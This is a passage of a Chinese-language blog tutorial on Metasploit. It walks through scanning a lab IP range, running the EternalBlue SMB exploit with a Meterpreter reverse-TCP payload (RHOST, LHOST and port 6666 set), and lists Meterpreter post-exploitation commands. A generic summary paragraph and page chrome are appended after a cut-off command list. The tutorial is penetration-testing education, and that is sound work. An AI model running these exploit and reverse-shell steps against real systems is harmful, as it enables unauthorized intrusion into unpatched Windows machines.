【工具使用】——Metasploit(MSF)使用详解(超详细)


![](https://img-blog.csdnimg.cn/img_convert/478658c6e1aab0d32739242255c96955.png)


2、查看这个模块需要配置的信息:  
 命令:



show options #查看这个模块需要配置的信息


![](https://img-blog.csdnimg.cn/img_convert/21c774a2fdc866832ac0eac2d2e62760.png)


3、设置要探测的远程目标:  
  
 注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞  
 命令:



set rhosts 192.168.100.100-192.168.100.190


![](https://img-blog.csdnimg.cn/img_convert/d3818403c2f90c69295a97789a4c7964.png)  
 4、对上面设置的ip范围内的主机进行攻击:  
 注:有+号的就是可能存在漏洞的主机,这里有2个主机存在漏洞  
 命令:



exploit


![](https://img-blog.csdnimg.cn/img_convert/b5ce2362099a745a60f4af9cbefd61cd.png)


##### 6.3 使用`Exploit漏洞利用模块`对漏洞进行利用:


1、选择漏洞攻击模块,对漏洞进行利用:  
 命令:



use exploit/windows/smb/ms17_010_eternalblue


![](https://img-blog.csdnimg.cn/img_convert/0671c7207b1d4ac8ab20b67426ba52c0.png)


2、查看这个漏洞的信息:  
 命令:



info: #查看这个漏洞的信息


![](https://img-blog.csdnimg.cn/img_convert/6bc619d3284d99ba0945611c986e05cb.png)


3、查看可攻击的系统平台,显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统:  
 命令:



show targets


![](https://img-blog.csdnimg.cn/img_convert/3d16919bcb18c46973a679ef6c0f5b65.png)  
 注:这里只有一个,有些其他的漏洞模块对操作系统的语言和版本要求的很严,比如MS08\_067,这样就要我们指定目标系统的版本的。如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)。


##### 6.4 Payload攻击载荷模块:



> 
>   攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令。
> 
> 
> 


1、查看攻击载荷:  
 命令:



show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payload


![](https://img-blog.csdnimg.cn/img_convert/4d978a469026786514f06d63fedee168.png)  
 2、设置攻击载荷:  
 命令:



set payload windows/x64/meterpreter/reverse_tcp


![](https://img-blog.csdnimg.cn/img_convert/ed0fc162aaf9a231085cb3fd6c282ee5.png)


3、查看模块需要配置的参数:  
 命令:



show options


![](https://img-blog.csdnimg.cn/img_convert/37f3b57e5b350e8a2e6e07367bb481d2.png)


4、设置攻击载荷参数:  
 命令:



set RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ip
set LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell
set lport 6666 #设置lport,也就是我们主机的端口,反弹shell到这个端口;如果我们这里不设置lport的话,默认是4444端口监听;


![](https://img-blog.csdnimg.cn/img_convert/dc1880d3f9bd63214e22a2aa301f063e.png)


5、进行攻击:


![](https://img-blog.csdnimg.cn/img_convert/a64efff9b838d6713671ad7f98577207.png)


#### 7. 后渗透阶段:


运行了`exploit命令`之后,我们开启了一个`reverse TCP监听器`来监听本地的`6666`端口,即我(攻击者)的本地主机地址(LHOST)和端口号(LPORT)。运行成功之后,我们将会看到命令提示符 `meterpreter >` 出现:


![](https://img-blog.csdnimg.cn/img_convert/c26acfe86c427f934ba1b5cd28c0ebf0.png)Meterpreter的命令用法:



Meterpreter > ?

核心命令:

命令 说明


? 帮助菜单
background 把当前会话挂到后台运行
bg background命令的别名
bgkill 杀死后台meterpreter 脚本
bglist 列出正在运行的后台脚本
bgrun 执行一个meterpreter脚本作为后台线程
channel 显示信息或控制活动频道
close 关闭一个频道
detach 分离Meterpreter会话(用于 http/https)
disable_unicode_encoding 禁用 unicode 字符串的编码
enable_unicode_encoding 启用 unicode 字符串的编码
exit 终止 Meterpreter 会话
get_timeouts 获取当前会话超时值
guid 获取会话 GUID
help 帮助菜单
info 显示有关 Post 模块的信息
irb 在当前会话中打开一个交互式 Ruby shell
load 加载一个或多个 Meterpreter 扩展
machine_id 获取连接到会话的机器的 MSF ID
migrate 将服务器迁移到另一个进程
pivot 管理枢轴侦听器
pry 在当前会话上打开 Pry 调试器
quit 终止 Meterpreter 会话
read 从通道读取数据
resource 运行存储在文件中的命令
run 执行一个 Meterpreter 脚本或 Post 模块
secure (重新)协商会话上的 TLV 数据包加密
sessions 快速切换到另一个会话
set_timeouts 设置当前会话超时值
sleep 强制 Meterpreter 安静,然后重新建立会话
ssl_verify

Metasploit是一种功能强大的漏洞利用工具集,用于测试网络安全并确认可能的漏洞。它是一个开源的安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用于信息收集、漏洞探测、漏洞利用等渗透测试的全流程。它被安全社区冠以“可以黑掉整个宇宙”的名号。Metasploit最初是用Perl语言编写的,但后来的新版本改用了Ruby语言编写。在Kali Linux中,Metasploit是预装的工具。 如果您想学习Metasploit的基础知识,可以参考\[1\]中提到的教程。该教程涵盖了Metasploit的安装、配置和基本使用。它还介绍了一些常用命令,帮助您更好地使用Metasploit。 另外,如果您使用的是Kali Linux操作系统,可以通过运行"apt update; apt install metasploit-framework"命令来安装Metasploit,而不是使用"msfupdate"命令。\[2\] 希望这些信息对您有帮助! #### 引用[.reference_title] - *1* [Metasploit详细教程](https://blog.youkuaiyun.com/xiao1234oaix/article/details/129760480)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [【工具使用】——Metasploit(MSF)使用详解(超详细)](https://blog.youkuaiyun.com/weixin_45588247/article/details/119614618)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值